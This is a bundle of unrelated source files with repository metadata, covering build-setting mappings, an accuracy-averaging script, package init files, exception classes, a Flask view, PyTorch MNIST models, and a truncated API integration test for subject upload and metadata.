"com_apple_xcode_tools_swift_compiler__SWIFT_INSTALL_OBJC_HEADER__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_INSTALL_OBJC_HEADER__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARIES_ONLY__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARIES_ONLY__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARY_PATH__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARY_PATH__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_LINK_OBJC_RUNTIME__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_LINK_OBJC_RUNTIME__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_MODULE_NAME__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_MODULE_NAME__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_BRIDGING_HEADER__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_BRIDGING_HEADER__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_INTERFACE_HEADER_NAME__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_INTERFACE_HEADER_NAME__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_OPTIMIZATION_LEVEL__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_OPTIMIZATION_LEVEL__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_PRECOMPILE_BRIDGING_HEADER__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_PRECOMPILE_BRIDGING_HEADER__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_REFLECTION_METADATA_LEVEL__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_REFLECTION_METADATA_LEVEL__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_RESPONSE_FILE_PATH__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_RESPONSE_FILE_PATH__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_SERIALIZE_DEBUGGING_OPTIONS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_SERIALIZE_DEBUGGING_OPTIONS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_STDLIB__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_STDLIB__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_SUPPRESS_WARNINGS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_SUPPRESS_WARNINGS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_SWIFT3_OBJC_INFERENCE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_SWIFT3_OBJC_INFERENCE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_TARGET_TRIPLE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_TARGET_TRIPLE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_THREAD_SANITIZER__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_THREAD_SANITIZER__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_TREAT_WARNINGS_AS_ERRORS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_TREAT_WARNINGS_AS_ERRORS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WHOLE_MODULE_OPTIMIZATION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WHOLE_MODULE_OPTIMIZATION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WMO_TARGETS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WMO_TARGETS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_VERSION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_VERSION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_WHOLE_MODULE_OPTIMIZATION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_WHOLE_MODULE_OPTIMIZATION__DefaultValue,
"com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__Condition": _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__Condition,
"com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__DefaultValue": _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__DefaultValue,
"com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__Condition": _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__Condition,
"com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__DefaultValue": _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__DefaultValue,
}
3423c1a4eb08c5636ac3a45f7a7642f0fb74d9e6 | 5,533 | py | Python | Implementacion/cross_calc.py | TheReverseWasp/TIA-Lab-Regresion_Logistica | 82d161c78bbf078b49f4ab583b371153be7eaf21 | [
"MIT"
] | null | null | null | Implementacion/cross_calc.py | TheReverseWasp/TIA-Lab-Regresion_Logistica | 82d161c78bbf078b49f4ab583b371153be7eaf21 | [
"MIT"
] | null | null | null | Implementacion/cross_calc.py | TheReverseWasp/TIA-Lab-Regresion_Logistica | 82d161c78bbf078b49f4ab583b371153be7eaf21 | [
"MIT"
] | null | null | null | tr = {}
tr[1] = [[0.7920792079207921, 0.801980198019802, 0.7722772277227723, 0.7920792079207921, 0.7920792079207921, 0.801980198019802], [0.7920792079207921, 0.7722772277227723, 0.7920792079207921, 0.801980198019802, 0.8118811881188119, 0.801980198019802], [0.7920792079207921, 0.7920792079207921, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.8118811881188119], [0.7920792079207921, 0.7920792079207921, 0.801980198019802, 0.801980198019802, 0.8118811881188119, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802]]
tr[2] = [[0.801980198019802, 0.8514851485148515, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8415841584158416], [0.8316831683168316, 0.8415841584158416, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614], [0.8514851485148515, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8613861386138614, 0.8613861386138614], [0.8514851485148515, 0.8514851485148515, 0.8415841584158416, 0.8613861386138614, 0.8613861386138614, 0.8514851485148515], [0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614, 0.8514851485148515, 0.8613861386138614], [0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614, 0.8514851485148515, 0.8613861386138614]]
tr[3] = [[0.7920792079207921, 0.801980198019802, 0.7722772277227723, 0.7920792079207921, 0.7920792079207921, 0.801980198019802], [0.7920792079207921, 0.7722772277227723, 0.7920792079207921, 0.801980198019802, 0.8118811881188119, 0.801980198019802], [0.7920792079207921, 0.7920792079207921, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.8118811881188119], [0.7920792079207921, 0.7920792079207921, 0.801980198019802, 0.801980198019802, 0.8118811881188119, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802]]
tr[4] = [[0.7821782178217822, 0.7920792079207921, 0.7920792079207921, 0.8217821782178217, 0.8217821782178217, 0.8316831683168316], [0.7821782178217822, 0.7920792079207921, 0.8217821782178217, 0.8316831683168316, 0.8415841584158416, 0.8415841584158416], [0.7821782178217822, 0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8316831683168316, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515], [0.801980198019802, 0.8217821782178217, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515]]
tr[5] = [[0.801980198019802, 0.8514851485148515, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8415841584158416], [0.8316831683168316, 0.8415841584158416, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614], [0.8514851485148515, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8613861386138614, 0.8613861386138614], [0.8514851485148515, 0.8514851485148515, 0.8415841584158416, 0.8613861386138614, 0.8613861386138614, 0.8514851485148515], [0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614, 0.8514851485148515, 0.8613861386138614], [0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614, 0.8514851485148515, 0.8613861386138614]]
tr[6] = [[0.7821782178217822, 0.7920792079207921, 0.7920792079207921, 0.8217821782178217, 0.8217821782178217, 0.8316831683168316], [0.7821782178217822, 0.7920792079207921, 0.8217821782178217, 0.8316831683168316, 0.8415841584158416, 0.8415841584158416], [0.7821782178217822, 0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8316831683168316, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515], [0.801980198019802, 0.8217821782178217, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515]]
# Element-wise average of the six trial matrices tr[1]..tr[6].
answer = []
for j in range(len(tr[1])):
temp = []
for k in range(len(tr[1][j])):
temp_num = 0
for i in range(1,7):
temp_num += tr[i][j][k]
temp_num /= 6
temp.append(temp_num)
answer.append(temp)
# Emit one LaTeX table row per averaged row; the bold first column is
# the training-set size, stepping by 500.
x = 500
for i in answer:
print("\\textbf{"+str(x)+"} & ", end="")
x += 500
for j in i:
print(str(round(j, 4)) + " & ", end="")
print("\\\\")
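The triple-nested averaging loop above can be expressed more compactly with `zip`; a minimal sketch, using a small hypothetical stand-in for the `tr[1]`..`tr[6]` matrices:

```python
# Hypothetical stand-in for tr[1]..tr[6]: six small trial matrices.
trials = [
    [[0.80, 0.82], [0.84, 0.86]],
    [[0.80, 0.82], [0.84, 0.86]],
    [[0.80, 0.82], [0.84, 0.86]],
    [[0.82, 0.84], [0.86, 0.88]],
    [[0.82, 0.84], [0.86, 0.88]],
    [[0.82, 0.84], [0.86, 0.88]],
]

# Element-wise mean across trials: zip(*trials) groups matching rows,
# zip(*rows) groups matching cells, replacing the triple index loop.
answer = [
    [sum(cells) / len(cells) for cells in zip(*rows)]
    for rows in zip(*trials)
]
print([[round(v, 2) for v in row] for row in answer])
# [[0.81, 0.83], [0.85, 0.87]]
```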
344dea78154822d22fa6bae67f4ec7a6eaffbace | 764 | py | Python | src/estimators/__init__.py | kjhall01/xcast | 17edfd8c79c5163b004800170bbcf21302e8c792 | [
"MIT"
] | 11 | 2021-11-01T21:38:17.000Z | 2022-03-30T11:46:32.000Z | src/estimators/__init__.py | kjhall01/xcast | 17edfd8c79c5163b004800170bbcf21302e8c792 | [
"MIT"
] | 7 | 2021-10-30T16:55:47.000Z | 2021-12-04T18:51:50.000Z | src/estimators/__init__.py | kjhall01/xcast | 17edfd8c79c5163b004800170bbcf21302e8c792 | [
"MIT"
] | 1 | 2021-11-18T10:35:29.000Z | 2021-11-18T10:35:29.000Z | from .base_estimator import BaseEstimator
from .classifiers import cMemberCount, cMultivariateLogisticRegression, cExtendedLogisticRegression, cMultiLayerPerceptron, cNaiveBayes, cRandomForest, cPOELM
from .regressors import EnsembleMean, BiasCorrectedEnsembleMean, rMultipleLinearRegression, rPoissonRegression, rGammaRegression, rMultiLayerPerceptron, rRandomForest, rRidgeRegression, rExtremeLearningMachine
classifiers = [cMemberCount, cMultivariateLogisticRegression, cExtendedLogisticRegression, cMultiLayerPerceptron, cNaiveBayes, cRandomForest, cPOELM]
regressors = [EnsembleMean, BiasCorrectedEnsembleMean, rMultipleLinearRegression, rPoissonRegression, rGammaRegression, rMultiLayerPerceptron, rRandomForest, rRidgeRegression, rExtremeLearningMachine]
346abe9b8b3737e0012efa04ffe7290d77916309 | 1,045 | py | Python | juno_magic/exception.py | y1ngyang/juno-magic | 108292ac747243ba1d80b9a42abcdc84ef8b6cb3 | [
"MIT"
] | 4 | 2016-06-19T13:07:51.000Z | 2017-01-05T18:01:52.000Z | juno_magic/exception.py | y1ngyang/juno-magic | 108292ac747243ba1d80b9a42abcdc84ef8b6cb3 | [
"MIT"
] | 37 | 2018-11-22T08:39:58.000Z | 2021-06-25T15:16:57.000Z | juno_magic/exception.py | y1ngyang/juno-magic | 108292ac747243ba1d80b9a42abcdc84ef8b6cb3 | [
"MIT"
] | 4 | 2016-06-22T02:19:16.000Z | 2016-06-28T15:37:05.000Z | from twisted.internet.error import ConnectError, ConnectionLost
class CloseHandshakeError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
class MaxFramePayloadSizeExceededError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
class MaxMessagePayloadSizeExceededError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
class OpenHandshakeTimeoutError(ConnectError):
"""An error occurred while connecting"""
class ServerConnectionDropTimeoutError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
class ServingFlashSocketPolicyFileError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
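Every class above subclasses Twisted's `ConnectionLost` or `ConnectError`, so callers can catch the whole family with one generic handler. A self-contained sketch of that pattern (local stand-in classes are used so it runs without Twisted installed; the real module imports the bases from `twisted.internet.error`):

```python
# Stand-in for twisted.internet.error.ConnectionLost so the sketch is
# self-contained; the real module imports it from Twisted.
class ConnectionLost(Exception):
    """Connection to the other side was lost in a non-clean fashion"""

class CloseHandshakeError(ConnectionLost):
    """Connection to the other side was lost in a non-clean fashion"""

class MaxFramePayloadSizeExceededError(ConnectionLost):
    """Connection to the other side was lost in a non-clean fashion"""

def describe_failure(exc):
    # One except clause covers every specific WebSocket failure mode,
    # because they all derive from the same base class.
    try:
        raise exc
    except ConnectionLost as e:
        return type(e).__name__

print(describe_failure(MaxFramePayloadSizeExceededError()))
# MaxFramePayloadSizeExceededError
```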
cab3c300a987d58ef06241b8c44bdb7755e49f21 | 152 | py | Python | app/main/views.py | liulixiang1988/webapp | 695722964c89db7d0ce1edd14b617b5597031c82 | [
"MIT"
] | 1 | 2015-08-17T03:51:31.000Z | 2015-08-17T03:51:31.000Z | app/main/views.py | liulixiang1988/webapp | 695722964c89db7d0ce1edd14b617b5597031c82 | [
"MIT"
] | null | null | null | app/main/views.py | liulixiang1988/webapp | 695722964c89db7d0ce1edd14b617b5597031c82 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
from flask import render_template
from . import main
@main.route('/')
def index():
    return render_template('main/index.html')
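The `@main.route('/')` decorator works because the blueprint's `route()` returns a decorator that registers the view function at import time. A toy, Flask-free sketch of that mechanism (the `Blueprint` class here is illustrative, not Flask's actual implementation):

```python
# Toy blueprint: route() returns a decorator that records the view
# function under its URL rule, mimicking how Flask blueprints collect
# views when the module is imported.
class Blueprint:
    def __init__(self, name):
        self.name = name
        self.routes = {}

    def route(self, rule):
        def decorator(func):
            self.routes[rule] = func
            return func
        return decorator

main = Blueprint("main")

@main.route("/")
def index():
    return "rendered main/index.html"

print(main.routes["/"]())  # rendered main/index.html
```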
cab5db8407c4f2a348d1fe637ce8036798959ea7 | 176 | py | Python | fruits/words/__init__.py | alienkrieg/fruits | b3b4b6afd7f97d2d4060909689f9811dc97981ed | [
"MIT"
] | 4 | 2021-10-08T11:14:54.000Z | 2021-12-30T13:56:32.000Z | fruits/words/__init__.py | alienkrieg/fruits | b3b4b6afd7f97d2d4060909689f9811dc97981ed | [
"MIT"
] | null | null | null | fruits/words/__init__.py | alienkrieg/fruits | b3b4b6afd7f97d2d4060909689f9811dc97981ed | [
"MIT"
] | null | null | null | from fruits.words.word import Word, SimpleWord
from fruits.words.letters import ExtendedLetter, letter
from fruits.words.creation import simplewords_by_weight, replace_letters
cae56fe3f2eda8b74124aa3cb518e5107c078959 | 1,986 | py | Python | src/models.py | aldipiroli/mnist_cnn | 8ce90473ace868e3bcd9fe7025ba5bbb7f1e9010 | [
"MIT"
] | null | null | null | src/models.py | aldipiroli/mnist_cnn | 8ce90473ace868e3bcd9fe7025ba5bbb7f1e9010 | [
"MIT"
] | null | null | null | src/models.py | aldipiroli/mnist_cnn | 8ce90473ace868e3bcd9fe7025ba5bbb7f1e9010 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
# Two conv+pool stages (28 -> 14 -> 7 for MNIST), dropout, then two
# fully connected layers ending in a 10-way softmax.
class ConvNet2L(nn.Module):
def __init__(self):
super(ConvNet2L, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(1, 32, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2))
self.layer2 = nn.Sequential(
nn.Conv2d(32, 64, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2))
self.drop_out = nn.Dropout()
self.fc1 = nn.Linear(7 * 7 * 64, 1000)
self.fc2 = nn.Linear(1000, 10)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = out.reshape(out.size(0), -1)
out = self.drop_out(out)
out = self.fc1(out)
out = self.fc2(out)
out = F.softmax(out, dim=1)
return out
# Same structure with a third conv+pool stage (28 -> 14 -> 7 -> 3),
# so the flattened feature size becomes 3 * 3 * 128.
class ConvNet3L(nn.Module):
def __init__(self):
super(ConvNet3L, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(1, 32, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2))
self.layer2 = nn.Sequential(
nn.Conv2d(32, 64, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2))
self.layer3 = nn.Sequential(
nn.Conv2d(64, 128, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2))
self.drop_out = nn.Dropout()
self.fc1 = nn.Linear(3 * 3 * 128, 1000)
self.fc2 = nn.Linear(1000, 10)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = self.layer3(out)
out = out.reshape(out.size(0), -1)
out = self.drop_out(out)
out = self.fc1(out)
out = self.fc2(out)
out = F.softmax(out, dim=1)
        return out
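The hard-coded flatten sizes (`7 * 7 * 64` in `ConvNet2L`, `3 * 3 * 128` in `ConvNet3L`) follow from the layer arithmetic: each 5x5 conv with stride 1 and padding 2 preserves the 28x28 MNIST spatial size, and each 2x2 max-pool with stride 2 floor-halves it. A quick check:

```python
# Standard output-size formulas for Conv2d and MaxPool2d.
def conv_out(n, kernel=5, stride=1, padding=2):
    return (n + 2 * padding - kernel) // stride + 1

def pool_out(n, kernel=2, stride=2):
    return (n - kernel) // stride + 1

n = 28  # MNIST input is 28x28
sizes = []
for _ in range(3):  # three conv+pool stages
    n = pool_out(conv_out(n))
    sizes.append(n)
print(sizes)  # [14, 7, 3]
```

After two stages the 7x7 maps with 64 channels flatten to 3136 features; after three stages the 3x3 maps with 128 channels flatten to 1152, matching the `nn.Linear` input sizes above.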
1b04120573fe644b3ee867b0c0f0d3fb5ecc57f5 | 74,685 | py | Python | subject/tests/integration/legacy_functional/test_v1_api.py | laoyigrace/subject | e6ed989fdc250917a19788112b22322b73b3550f | [
"Apache-2.0"
] | null | null | null | subject/tests/integration/legacy_functional/test_v1_api.py | laoyigrace/subject | e6ed989fdc250917a19788112b22322b73b3550f | [
"Apache-2.0"
] | null | null | null | subject/tests/integration/legacy_functional/test_v1_api.py | laoyigrace/subject | e6ed989fdc250917a19788112b22322b73b3550f | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import hashlib
import os
import tempfile
from oslo_serialization import jsonutils
from oslo_utils import units
import testtools
from subject.common import timeutils
from subject.tests.integration.legacy_functional import base
from subject.tests.utils import minimal_headers
FIVE_KB = 5 * units.Ki
FIVE_GB = 5 * units.Gi
class TestApi(base.ApiTest):
def test_get_head_simple_post(self):
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
# 1. GET /subjects/detail
# Verify no public subjects
path = "/v1/subjects/detail"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
        # 2. POST /subjects with public subject named Subject1, with no
        # location attribute and no custom properties.
        # Verify a 201 Created is returned
subject_data = "*" * FIVE_KB
headers = minimal_headers('Subject1')
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers,
body=subject_data)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
self.assertEqual(hashlib.md5(subject_data).hexdigest(),
data['subject']['checksum'])
self.assertEqual(FIVE_KB, data['subject']['size'])
self.assertEqual("Subject1", data['subject']['name'])
self.assertTrue(data['subject']['is_public'])
# 3. HEAD subject
# Verify subject found now
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD')
self.assertEqual(200, response.status)
self.assertEqual("Subject1", response['x-subject-meta-name'])
# 4. GET subject
# Verify all information on subject we just added is correct
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
expected_subject_headers = {
'x-subject-meta-id': subject_id,
'x-subject-meta-name': 'Subject1',
'x-subject-meta-is_public': 'True',
'x-subject-meta-status': 'active',
'x-subject-meta-disk_format': 'raw',
'x-subject-meta-container_format': 'ovf',
'x-subject-meta-size': str(FIVE_KB)}
expected_std_headers = {
'content-length': str(FIVE_KB),
'content-type': 'application/octet-stream'}
for expected_key, expected_value in expected_subject_headers.items():
self.assertEqual(expected_value, response[expected_key],
"For key '%s' expected header value '%s'. "
"Got '%s'" % (expected_key,
expected_value,
response[expected_key]))
for expected_key, expected_value in expected_std_headers.items():
self.assertEqual(expected_value, response[expected_key],
"For key '%s' expected header value '%s'. "
"Got '%s'" % (expected_key,
expected_value,
response[expected_key]))
self.assertEqual("*" * FIVE_KB, content)
self.assertEqual(hashlib.md5("*" * FIVE_KB).hexdigest(),
hashlib.md5(content).hexdigest())
# 5. GET /subjects
        # Verify one public subject
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
expected_result = {"subjects": [
{"container_format": "ovf",
"disk_format": "raw",
"id": subject_id,
"name": "Subject1",
"checksum": "c2e5db72bd7fd153f53ede5da5a06de3",
"size": 5120}]}
self.assertEqual(expected_result, jsonutils.loads(content))
# 6. GET /subjects/detail
# Verify subject and all its metadata
path = "/v1/subjects/detail"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
expected_subject = {
"status": "active",
"name": "Subject1",
"deleted": False,
"container_format": "ovf",
"disk_format": "raw",
"id": subject_id,
"is_public": True,
"deleted_at": None,
"properties": {},
"size": 5120}
subject = jsonutils.loads(content)
for expected_key, expected_value in expected_subject.items():
self.assertEqual(expected_value, subject['subjects'][0][expected_key],
"For key '%s' expected header value '%s'. "
"Got '%s'" % (expected_key,
expected_value,
subject['subjects'][0][expected_key]))
# 7. PUT subject with custom properties of "distro" and "arch"
# Verify 200 returned
headers = {'X-Subject-Meta-Property-Distro': 'Ubuntu',
'X-Subject-Meta-Property-Arch': 'x86_64'}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT', headers=headers)
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual("x86_64", data['subject']['properties']['arch'])
self.assertEqual("Ubuntu", data['subject']['properties']['distro'])
# 8. GET /subjects/detail
# Verify subject and all its metadata
path = "/v1/subjects/detail"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
expected_subject = {
"status": "active",
"name": "Subject1",
"deleted": False,
"container_format": "ovf",
"disk_format": "raw",
"id": subject_id,
"is_public": True,
"deleted_at": None,
"properties": {'distro': 'Ubuntu', 'arch': 'x86_64'},
"size": 5120}
subject = jsonutils.loads(content)
for expected_key, expected_value in expected_subject.items():
self.assertEqual(expected_value, subject['subjects'][0][expected_key],
"For key '%s' expected header value '%s'. "
"Got '%s'" % (expected_key,
expected_value,
subject['subjects'][0][expected_key]))
# 9. PUT subject and remove a previously existing property.
headers = {'X-Subject-Meta-Property-Arch': 'x86_64'}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT', headers=headers)
self.assertEqual(200, response.status)
path = "/v1/subjects/detail"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects'][0]
self.assertEqual(1, len(data['properties']))
self.assertEqual("x86_64", data['properties']['arch'])
# 10. PUT subject and add a previously deleted property.
headers = {'X-Subject-Meta-Property-Distro': 'Ubuntu',
'X-Subject-Meta-Property-Arch': 'x86_64'}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT', headers=headers)
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
path = "/v1/subjects/detail"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects'][0]
self.assertEqual(2, len(data['properties']))
self.assertEqual("x86_64", data['properties']['arch'])
self.assertEqual("Ubuntu", data['properties']['distro'])
self.assertNotEqual(data['created_at'], data['updated_at'])
# DELETE subject
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'DELETE')
self.assertEqual(200, response.status)
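The upload steps above assert that the stored checksum is the MD5 hex digest of the raw payload. A standalone sketch of that computation (Python 3, so the payload is bytes rather than the str this Python 2-era suite uses):

```python
import hashlib

FIVE_KB = 5 * 1024


def md5_checksum(payload):
    # The checksum recorded for a subject is simply the MD5 hex
    # digest of the raw uploaded bytes.
    return hashlib.md5(payload).hexdigest()


# The 5 KB payload of '*' bytes used throughout these tests:
checksum = md5_checksum(b"*" * FIVE_KB)
```

This reproduces the literal checksum value asserted against the subject listing in step 5.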
def test_queued_process_flow(self):
"""
We test the process flow where a user registers a subject
with Glance but does not immediately upload the subject file.
Later, the user uploads the subject file using a PUT operation.
We track the changing subject status throughout this process.
0. GET /subjects
- Verify no public subjects
1. POST /subjects with public subject named Subject1 with no location
attribute and no subject data.
- Verify 201 returned
2. GET /subjects
- Verify one public subject
3. HEAD subject
- Verify subject now in queued status
4. PUT subject with subject data
- Verify 200 returned
5. HEAD subject
- Verify subject now in active status
6. GET /subjects
- Verify one public subject
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
# 1. POST /subjects with public subject named Subject1
# with no location or subject data
headers = minimal_headers('Subject1')
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
self.assertIsNone(data['subject']['checksum'])
self.assertEqual(0, data['subject']['size'])
self.assertEqual('ovf', data['subject']['container_format'])
self.assertEqual('raw', data['subject']['disk_format'])
self.assertEqual("Subject1", data['subject']['name'])
self.assertTrue(data['subject']['is_public'])
subject_id = data['subject']['id']
# 2. GET /subjects
# Verify 1 public subject
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(subject_id, data['subjects'][0]['id'])
self.assertIsNone(data['subjects'][0]['checksum'])
